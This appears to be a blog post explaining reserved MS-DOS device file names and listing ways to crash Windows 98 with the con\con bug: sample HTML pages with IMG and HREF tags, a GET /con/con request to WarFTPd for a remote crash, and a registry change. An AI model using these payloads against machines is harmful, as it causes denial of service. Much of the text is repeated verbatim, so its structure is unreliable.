In MS-DOS, several special "device files" were available to aid in performing certain tasks, such as clearing the screen or deleting extraneous output from a program. In order to maintain backwards-compatibility, all versions of Windows up to and including Windows 7 will refuse to allow you to create a file with these "reserved" device file names. The following file names are reserved:
CON, incidentally, was a device file used to capture whatever was printed onscreen.
NUL, AUX, CON, COM1-4, LPT1-3, and PRN
are reserved words used for DOS Devices
These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:
CLOCK$ - System clock
CON - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communicationport
COMn - Second, Third, ... communicationport
LPT1 or PRN - First parallel port
NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$ - Unknown
Besides,
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
- CON
- PRN
- AUX
- NUL
- COM1
- COM2
- COM3
- COM4
- COM5
- COM6
- COM7
- COM8
- COM9
- LPT1
- LPT2
- LPT3
- LPT4
- LPT5
- LPT6
- LPT7
- LPT8
- LPT9
CON, incidentally, was a device file used to capture whatever was printed onscreen.
NUL, AUX, CON, COM1-4, LPT1-3, and PRN
are reserved words used for DOS Devices
These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:
CLOCK$ - System clock
CON - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communicationport
COMn - Second, Third, ... communicationport
LPT1 or PRN - First parallel port
NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$ - Unknown
Besides,
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
No comments:
Post a Comment